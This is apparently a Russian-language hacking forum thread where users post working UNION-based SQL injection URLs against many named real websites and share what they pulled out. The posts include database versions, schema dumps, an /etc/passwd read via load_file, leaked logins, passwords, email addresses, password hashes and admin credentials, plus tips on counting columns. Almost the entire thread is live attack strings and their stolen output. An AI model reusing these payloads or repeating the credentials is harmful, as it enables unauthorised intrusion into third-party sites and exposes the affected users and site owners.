theplace.ru http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5/* 5.0.22/theplace/theplace@localhost http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password),5+from+links/* логин/пароль baddy13/superior http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password),5+from+models/* логин/пароль rukzak/rukzak ------------------------------------------------------------------------- http://stroiru.com/doc_detail.php?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user())/* 4.0.27/goravtomat_db2/[email protected] ------------------------------------------------------------------------- r-id.ru http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1/* 5.0.32-Debian_7etch1-log/rid/rid@localhost http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,email,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1+from+users+limit+0,1/*. мейл/хеш [email protected]/35560b3d7e41a43aa12c6d01dc9a5131 Админка: http://www.r-id.ru/admin Логин/пасс для админки: http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,toString,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1+from+admins/* RIDadmin/NoStranger
вот такой приколяк.... http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=4+AND+1=0+union+select+0,0,0,concat(char(80),char(114),char(101),char(118),char(101),char(100)),concat(char(89),%20char(97),char(32),char(103),char(108),char(117),char(107)) а команду выполнит не получилось..
http://www.bluebit.com.au/ Выводит полную историю PayPal операций конторы. Там они как то софт за 30$ штука продают . http://www.atcnt.com.au/
love.svadba.net.ru в таблице users, такие поля pass,id, email, остальных не подбирал и есть раскрытие путей: Notice: Undefined variable: fname in /usr/local/psa/home/vhosts/svadba.net.ru/sub/love/ankett.php on line 7 сильно не рылся,но у них там форум есть большой. Может кто жену ищет ему это поможет
vip-tur.ru HTML: http://www.vip-tur.ru/?page=country&id=22+union+select+0,concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* USERIMAFLEX_VIPTUR@LOCALHOST VERSION:5.0.40 DATABASEIMAFLEX_VIPTUR HTML: http://www.vip-tur.ru/?page=country&id=22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables/* - имена всех таблиц HTML: http://www.vip-tur.ru/?page=country&id=22+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.columns/* - имена всех колонок
HTML: http://www.imc.pl.ua/katalog_ssilok.php?show_links=6+union+select+1,2,3,4,5,6,7,concat_ws(0x10a,version(),database(),user())/* 4.1.22-log imc_imc imc_imcb@localhost я туговат в этом деле, но данные достал... Только не кричите... что возвожно сделать с помощью этой инфы?
WuWu, ну к information_schema там доступа нет, значит структуру их базы мы не узнаем. Да и чего там интересного вобще узнавать ? Форума у них нету. Авторизации для юзеров я тоже не нашел.. Не перспективно, имхо )) --------------------------------------------------------------------------- http://www.jetcharter.ru/new/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6/* 4.0.26/jetcharterru/[email protected]
нашол дырку в статистике сайта... вот, но немогу добраться до структуры!! HTML: http://www.top.iv-fr.net/stat.php?id=1+UNION+SELECT+1,2,3,4,/*
Используй конструкцию order+by+1/* (подробнее читай в разделе статьи) Там 25 столбцов. HTML: http://www.top.iv-fr.net/stat.php?id=-1+union+select+0,1,2,3,concat(Version(),0x3a,USER(),0x3a,DATABASE()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 4.1.22-standard:ivfr_top1@localhost:ivfr_top
И нету доступа к information_schema ) После нескольких попыток перебора получаем http://www.top.iv-fr.net/top.php?cat=-1+union+select+1,2,3,4,concat_ws(0x2F,mail,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+top_users/* мейл/пароль [email protected]/1 [email protected]/8kl9mt [email protected]/dwpa8g и тд. ЗЫ если хочешь поставить кому-нибудь плюс - жми на кнопку репутация в правом верхнем углу поста, а не на те +- под аватаркой ))
я до токо до 20 дошол был(от я лентяй Ы..) сорри... может я тупой, я ввёл твой запрос... и неувидел того что увидел ты...
Code: http://zvisti.com.ua/info.php?id=45084444+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,email,12+from+subscribers/* больше ничего интересного в базе нет Code: http://zvisti.com.ua/info.php?id=45084444+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,count(email),12+from+subscribers/* всего 78 строчек
Code: http://www.lazy-games.com/localiz/info.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* Code: http://www.northberwickuk.com/info.php?id=-268+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,1,4,5,7,6,1,1,1,1/* Code: http://www.alphaonenow.org/info.php?id=-999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* Code: http://www.cacgrants.org/cuyahoga.arts.and.culture.news.room.php?id=-999'+union+select+1,concat(version(),0x3a,user()),3,4,5,6,7,8,9,0/* Code: http://www.br.clicksconnect.com/index.php/riodejaneiro/hotels?id=-9968+union+select+1,2,3,4,load_file(0x2f6574632f706173737764),1,2,3,5,9/*&page=address Code: http://www.aha.am/index.php?lang=eng&s=hotels&id=-999+union+select+1,2,3,4,5/* Code: http://www.season.com.ua/show_photos.php?table=hotels&id=-999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/* @_@
HTML: http://www.aquarius.pl.ua/index.php?pg=vacancies&id=1+UNION+SELECT+1,2,concat(Version(),0x3a,USER(%20%20),0x3a,DATABASE()),4,5,6,7,8/* аж самого улыбнуло
http://educasources.education.fr/ HTML: http://educasources.education.fr/selecthema.asp?id=1)+or+1=@@version-- « Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) » HTML: http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+db_name())-- « MDC » HTML: http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+system_user)-- « web » Все таблицы (в французском не смыслю, не стал проверять содержимое таблиц): HTML: http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('canal_sceren_ressources','T_LIEN_NIVEAU','Broch_Rubriques','T_REFERENCE','Broch_SousRubriques','tempcedric','Yann_Temp','tempcedric2','CodePrix','tempcedric3','Personnes_panier_admdoc','VIEW1','Cyb_Departement','VIEW2','Cyb_inscrits','vue_app_arch_form1','Date_observatoire','Broch_Prix','vue_app_arch_liste1b','Yann_Temp2','Descriptions_Documentaires','EducaFluxRSS','vue_app_barre','Partenaires','PGI_Champs','Descriptions_Editoriales','EducaRSSPerso','vue_articlerevue','Producteurs_Ressources','old_PGI_Disciplines','Dewey','vue_auteurs','Ressources_Co_Editeurs','PGI_Disponibilite','Dewey_Ressources','2007_cor_2006_2007','vue_bases_revues','old_PGI_Niveaux','Discipline_Option_RJC','motbis_MicroT','vue_bases_videos','Ressources_Partenaires','old_PGI_Supports')--
http://astrol.ru/index.php?page=-125+union+select+1,2,3,4,5,6,7/* Не смог ничего вывести ----------------------------------------------------------------------- http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 5.0.45-log/[email protected]/u32888 Все таблицы: http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables/* Все колонки: http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns/* ----------------------------------------------------------------------- http://lit.phil.pu.ru/article.php?id=7+union+select+1,2,3,4,5/* Пробывал вывести version() user() database() через конверты...не получилось... ----------------------------------------------------------------------- http://encycl.anthropology.ru/article.php?id=472+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10/* 5.0.45-community-log/anthropo_visitor@localhost/anthropo_encycl Есть таблица user Все таблицы: http://encycl.anthropology.ru/article.php?id=472+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables/* Все колонки: http://encycl.anthropology.ru/article.php?id=472+union+select+1,column_name,3,4,5,6,7,8,9,10+from+information_schema.columns/* ----------------------------------------------------------------------- http://rybalka.zooclub.ru/article.php?id=-105+union+select+concat_ws(0x2f,version(),user(),database()),2,3/* 5.0.45-community-log/zooclub_zooclub@localhost/zooclub_rybalka Все таблицы: http://rybalka.zooclub.ru/article.php?id=-105+union+select+table_name,2,3+from+information_schema.tables/* Все колонки: http://rybalka.zooclub.ru/article.php?id=-105+union+select+column_name,2,3+from+information_schema.columns/* ----------------------------------------------------------------------- http://www.order.elite-games.ru/article.php?id=-175+union+select+1,2,3,4,concat_ws(0x2f,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 4.1.21-community-nt/order@localhost/order
HTML: http://www.orda-clan.ru/comments.php?n=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* помогите не догоняю структуру, дошол до ,50,51/*
http://orda-clan.ru/comments.php?n=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),12/* 4.1.11-Debian_4sarge7-log/mihanikus_site/[email protected] Доступа к information_schema нет. Еще есть таблицы mihanikus.user, mihanikus.users, orda.user, orda.users - но к ним тоже нету доступа ) Подбирай, возможно найдешь другие интересные таблицы
HTML: http://www.vkus.by/index.php?n=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x3a,DATABASE()),4,5,6/* симпатично вышло =)
